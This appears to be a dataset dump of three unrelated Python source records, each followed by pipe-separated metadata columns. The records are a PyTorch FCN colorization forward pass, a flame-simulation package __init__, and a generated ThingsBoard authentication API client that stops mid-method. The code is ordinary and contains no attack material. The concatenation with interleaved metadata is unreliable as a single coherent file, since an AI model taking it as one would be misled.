        """conv -> (optional) batch-norm -> ReLU.

        The BN layer is looked up by name so it is only touched when
        ``self.batch_norm`` is True (the attribute does not exist otherwise).
        BUGFIX: the original forward applied `conv2_2_bn` even in the
        batch_norm=False branch, raising AttributeError.
        """
        h = conv(h)
        if self.batch_norm:
            h = getattr(self, bn_name)(h)
        return relu(h)

    def forward(self, x):
        """Return the soft color-bin score map cropped to x's spatial size."""
        h = self._cbr(self.conv1_1, 'conv1_1_bn', self.relu1_1, x)
        h = self._cbr(self.conv1_2, 'conv1_2_bn', self.relu1_2, h)
        h = self.pool1(h)
        h = self._cbr(self.conv2_1, 'conv2_1_bn', self.relu2_1, h)
        h = self._cbr(self.conv2_2, 'conv2_2_bn', self.relu2_2, h)
        h = self.pool2(h)
        h = self._cbr(self.conv3_1, 'conv3_1_bn', self.relu3_1, h)
        h = self._cbr(self.conv3_2, 'conv3_2_bn', self.relu3_2, h)
        h = self._cbr(self.conv3_3, 'conv3_3_bn', self.relu3_3, h)
        h = self.pool3(h)
        pool3 = h  # 1/8, kept for the skip connection
        h = self._cbr(self.conv4_1, 'conv4_1_bn', self.relu4_1, h)
        h = self._cbr(self.conv4_2, 'conv4_2_bn', self.relu4_2, h)
        h = self._cbr(self.conv4_3, 'conv4_3_bn', self.relu4_3, h)
        h = self.pool4(h)
        pool4 = h  # 1/16, kept for the skip connection
        h = self._cbr(self.conv5_1, 'conv5_1_bn', self.relu5_1, h)
        h = self._cbr(self.conv5_2, 'conv5_2_bn', self.relu5_2, h)
        h = self._cbr(self.conv5_3, 'conv5_3_bn', self.relu5_3, h)
        h = self.pool5(h)
        h = self._cbr(self.fc6, 'fc6_bn', self.relu6, h)
        h = self.drop6(h)
        h = self._cbr(self.fc7, 'fc7_bn', self.relu7, h)
        h = self.drop7(h)
        if self.bin_type == 'one-hot':
            raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
        elif self.bin_type == 'soft':
            h = self.score_fr(h)
            h = self.upscore2(h)
            upscore2 = h  # 1/16
            # Fuse cropped pool4 scores at 1/16.
            h = self.score_pool4(pool4)
            h = h[:, :, 5:5 + upscore2.size()[2], 5:5 + upscore2.size()[3]]
            score_pool4c = h  # 1/16
            h = upscore2 + score_pool4c  # 1/16
            h = self.upscore_pool4(h)
            upscore_pool4 = h  # 1/8
            # Fuse cropped pool3 scores at 1/8.
            h = self.score_pool3(pool3)
            h = h[:, :,
                  9:9 + upscore_pool4.size()[2],
                  9:9 + upscore_pool4.size()[3]]
            score_pool3c = h  # 1/8
            h = upscore_pool4 + score_pool3c  # 1/8
            h = self.upscore8(h)
            h = h[:, :, 31:31 + x.size()[2], 31:31 + x.size()[3]].contiguous()
        return h

    def copy_params_from_fcn16s(self, fcn16s):
        """Copy weights from a trained FCN16sColor into same-named layers."""
        for name, l1 in fcn16s.named_children():
            try:
                l2 = getattr(self, name)
                l2.weight  # skip ReLU / Dropout
            except Exception:
                continue
            assert l1.weight.size() == l2.weight.size()
            l2.weight.data.copy_(l1.weight.data)
            if l1.bias is not None:
                # Bias-free layers (bilinear upsamplers) carry no bias.
                assert l1.bias.size() == l2.bias.size()
                l2.bias.data.copy_(l1.bias.data)
| 35.652646
| 92
| 0.554004
| 3,819
| 26,276
| 3.61901
| 0.056559
| 0.046668
| 0.045149
| 0.055351
| 0.8961
| 0.887273
| 0.870704
| 0.862166
| 0.84936
| 0.84936
| 0
| 0.095903
| 0.323794
| 26,276
| 736
| 93
| 35.701087
| 0.681956
| 0.037296
| 0
| 0.874161
| 0
| 0
| 0.009478
| 0
| 0
| 0
| 0
| 0.001359
| 0.011745
| 1
| 0.026846
| false
| 0.005034
| 0.008389
| 0.003356
| 0.053691
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4db2320d634b405af0f91c11b7434c4236a04a8
| 511
|
py
|
Python
|
ctutils/driver/__init__.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/__init__.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/__init__.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
from . import chem_uq
from .free_flame import free_flame
from .free_flame import free_flame_
from .counterflow_premixed_flame import counterflow_premixed_flame
from .counterflow_premixed_flame import counterflow_premixed_flame_
from .counterflow_premixed_extinction import counterflow_premixed_extinction
from .counterflow_premixed_extinction import counterflow_premixed_extinction_
from .counterflow_twin_flame import counterflow_twin_flame
from .counterflow_twin_extinction import counterflow_twin_extinction
| 51.1
| 77
| 0.911937
| 64
| 511
| 6.78125
| 0.15625
| 0.35023
| 0.184332
| 0.193548
| 0.74424
| 0.74424
| 0.74424
| 0.626728
| 0.626728
| 0.626728
| 0
| 0
| 0.07045
| 511
| 9
| 78
| 56.777778
| 0.913684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
521f33ca62ccf67facadd26781c7cc283a1f29c7
| 36,064
|
py
|
Python
|
tb_rest_client/api/api_ce/auth_controller_api.py
|
maksonlee/python_tb_rest_client
|
a6cd17ef4de31f68c3226b7a9835292fbac4b1fa
|
[
"Apache-2.0"
] | 1
|
2021-07-19T10:09:04.000Z
|
2021-07-19T10:09:04.000Z
|
tb_rest_client/api/api_ce/auth_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
tb_rest_client/api/api_ce/auth_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class AuthControllerApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Ref: https://github.com/swagger-api/swagger-codegen

    Client bindings for the ThingsBoard authentication endpoints: account
    activation, password change/reset, OAuth2 client discovery, current-user
    lookup and logout.  Every operation comes in two flavours: a convenience
    wrapper that returns only the response body, and a ``*_with_http_info``
    variant exposing the low-level ``ApiClient.call_api`` options
    (``async_req``, ``_preload_content``, ``_request_timeout``, ...).
    """

    def __init__(self, api_client=None):
        # Use a default-configured ApiClient unless the caller supplies one.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def activate_user_using_post(self, activate_request, **kwargs):  # noqa: E501
        """activateUser  # noqa: E501

        Activate a user account (``POST /api/noauth/activate``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.activate_user_using_post(activate_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param dict activate_request: activateRequest (required)
        :param bool send_activation_mail: sendActivationMail
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.activate_user_using_post_with_http_info(activate_request, **kwargs)  # noqa: E501
        else:
            (data) = self.activate_user_using_post_with_http_info(activate_request, **kwargs)  # noqa: E501
            return data

    def activate_user_using_post_with_http_info(self, activate_request, **kwargs):  # noqa: E501
        """activateUser  # noqa: E501

        Low-level variant of :meth:`activate_user_using_post`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.activate_user_using_post_with_http_info(activate_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param activate_request: activateRequest (required)
        :param bool send_activation_mail: sendActivationMail
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['activate_request', 'send_activation_mail']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # NOTE(review): all_params is assembled but never consulted below —
        # the usual unknown-kwarg validation loop is absent in this variant.

        # Capture named arguments via locals(), then fold kwargs in.  This is
        # why no extra locals may be introduced before this point.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'activate_request' is set
        if ('activate_request' not in params or
                params['activate_request'] is None):
            raise ValueError("Missing the required parameter `activate_request` when calling `activate_user_using_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'send_activation_mail' in params:
            query_params.append(('sendActivationMail', params['send_activation_mail']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'activate_request' in params:
            body_params = params['activate_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — activation is a no-auth endpoint.
        auth_settings = []  # noqa: E501

        # Path uses RFC 6570 query-template syntax ({?sendActivationMail});
        # presumably normalized by ApiClient — TODO confirm.
        return self.api_client.call_api(
            '/api/noauth/activate{?sendActivationMail}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='str',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def change_password_using_post(self, change_password_request, **kwargs):  # noqa: E501
        """changePassword  # noqa: E501

        Change the current user's password (``POST /api/auth/changePassword``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.change_password_using_post(change_password_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str change_password_request: changePasswordRequest (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.change_password_using_post_with_http_info(change_password_request, **kwargs)  # noqa: E501
        else:
            (data) = self.change_password_using_post_with_http_info(change_password_request, **kwargs)  # noqa: E501
            return data

    def change_password_using_post_with_http_info(self, change_password_request, **kwargs):  # noqa: E501
        """changePassword  # noqa: E501

        Low-level variant of :meth:`change_password_using_post`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.change_password_using_post_with_http_info(change_password_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str change_password_request: changePasswordRequest (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['change_password_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'change_password_request' is set
        if ('change_password_request' not in params or
                params['change_password_request'] is None):
            raise ValueError("Missing the required parameter `change_password_request` when calling `change_password_using_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'change_password_request' in params:
            body_params = params['change_password_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: requires a logged-in session token.
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/auth/changePassword', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def check_activate_token_using_get(self, activate_token, **kwargs):  # noqa: E501
        """checkActivateToken  # noqa: E501

        Validate an account-activation token (``GET /api/noauth/activate``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.check_activate_token_using_get(activate_token, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str activate_token: activateToken (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.check_activate_token_using_get_with_http_info(activate_token, **kwargs)  # noqa: E501
        else:
            (data) = self.check_activate_token_using_get_with_http_info(activate_token, **kwargs)  # noqa: E501
            return data

    def check_activate_token_using_get_with_http_info(self, activate_token, **kwargs):  # noqa: E501
        """checkActivateToken  # noqa: E501

        Low-level variant of :meth:`check_activate_token_using_get`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.check_activate_token_using_get_with_http_info(activate_token, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str activate_token: activateToken (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['activate_token']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'activate_token' is set
        if ('activate_token' not in params or
                params['activate_token'] is None):
            raise ValueError("Missing the required parameter `activate_token` when calling `check_activate_token_using_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'activate_token' in params:
            query_params.append(('activateToken', params['activate_token']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — token check is a no-auth endpoint.
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/noauth/activate{?activateToken}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='str',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def check_reset_token_using_get(self, reset_token, **kwargs):  # noqa: E501
        """checkResetToken  # noqa: E501

        Validate a password-reset token (``GET /api/noauth/resetPassword``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.check_reset_token_using_get(reset_token, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str reset_token: resetToken (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.check_reset_token_using_get_with_http_info(reset_token, **kwargs)  # noqa: E501
        else:
            (data) = self.check_reset_token_using_get_with_http_info(reset_token, **kwargs)  # noqa: E501
            return data

    def check_reset_token_using_get_with_http_info(self, reset_token, **kwargs):  # noqa: E501
        """checkResetToken  # noqa: E501

        Low-level variant of :meth:`check_reset_token_using_get`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.check_reset_token_using_get_with_http_info(reset_token, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str reset_token: resetToken (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['reset_token']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'reset_token' is set
        if ('reset_token' not in params or
                params['reset_token'] is None):
            raise ValueError("Missing the required parameter `reset_token` when calling `check_reset_token_using_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'reset_token' in params:
            query_params.append(('resetToken', params['reset_token']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — token check is a no-auth endpoint.
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/noauth/resetPassword{?resetToken}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='str',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_o_auth2_clients_using_post(self, **kwargs):  # noqa: E501
        """getOAuth2Clients  # noqa: E501

        List available OAuth2 clients (``POST /api/noauth/oauth2Clients``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.get_o_auth2_clients_using_post(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[OAuth2ClientInfo]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_o_auth2_clients_using_post_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_o_auth2_clients_using_post_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_o_auth2_clients_using_post_with_http_info(self, **kwargs):  # noqa: E501
        """getOAuth2Clients  # noqa: E501

        Low-level variant of :meth:`get_o_auth2_clients_using_post`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.get_o_auth2_clients_using_post_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[OAuth2ClientInfo]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — no-auth endpoint.
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/noauth/oauth2Clients', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[OAuth2ClientInfo]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_user_password_policy_using_get(self, **kwargs):  # noqa: E501
        """getUserPasswordPolicy  # noqa: E501

        Fetch the password policy (``GET /api/noauth/userPasswordPolicy``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.get_user_password_policy_using_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: UserPasswordPolicy
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_user_password_policy_using_get_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_user_password_policy_using_get_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_user_password_policy_using_get_with_http_info(self, **kwargs):  # noqa: E501
        """getUserPasswordPolicy  # noqa: E501

        Low-level variant of :meth:`get_user_password_policy_using_get`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.get_user_password_policy_using_get_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: UserPasswordPolicy
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — no-auth endpoint.
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/noauth/userPasswordPolicy', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='UserPasswordPolicy',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_user_using_get(self, **kwargs):  # noqa: E501
        """getUser  # noqa: E501

        Fetch the currently authenticated user (``GET /api/auth/user``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.get_user_using_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: User
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_user_using_get_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_user_using_get_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_user_using_get_with_http_info(self, **kwargs):  # noqa: E501
        """getUser  # noqa: E501

        Low-level variant of :meth:`get_user_using_get`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.get_user_using_get_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: User
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: requires a logged-in session token.
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/auth/user', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='User',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def logout_using_post(self, **kwargs):  # noqa: E501
        """logout  # noqa: E501

        Terminate the current session (``POST /api/auth/logout``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.logout_using_post(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.logout_using_post_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.logout_using_post_with_http_info(**kwargs)  # noqa: E501
            return data

    def logout_using_post_with_http_info(self, **kwargs):  # noqa: E501
        """logout  # noqa: E501

        Low-level variant of :meth:`logout_using_post`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.logout_using_post_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: requires a logged-in session token.
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/auth/logout', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def request_reset_password_by_email_using_post(self, reset_password_by_email_request, **kwargs):  # noqa: E501
        """requestResetPasswordByEmail  # noqa: E501

        Request a reset e-mail (``POST /api/noauth/resetPasswordByEmail``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.request_reset_password_by_email_using_post(reset_password_by_email_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str reset_password_by_email_request: resetPasswordByEmailRequest (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.request_reset_password_by_email_using_post_with_http_info(reset_password_by_email_request, **kwargs)  # noqa: E501
        else:
            (data) = self.request_reset_password_by_email_using_post_with_http_info(reset_password_by_email_request, **kwargs)  # noqa: E501
            return data

    def request_reset_password_by_email_using_post_with_http_info(self, reset_password_by_email_request, **kwargs):  # noqa: E501
        """requestResetPasswordByEmail  # noqa: E501

        Low-level variant of :meth:`request_reset_password_by_email_using_post`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.request_reset_password_by_email_using_post_with_http_info(reset_password_by_email_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str reset_password_by_email_request: resetPasswordByEmailRequest (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['reset_password_by_email_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'reset_password_by_email_request' is set
        if ('reset_password_by_email_request' not in params or
                params['reset_password_by_email_request'] is None):
            raise ValueError("Missing the required parameter `reset_password_by_email_request` when calling `request_reset_password_by_email_using_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'reset_password_by_email_request' in params:
            body_params = params['reset_password_by_email_request']
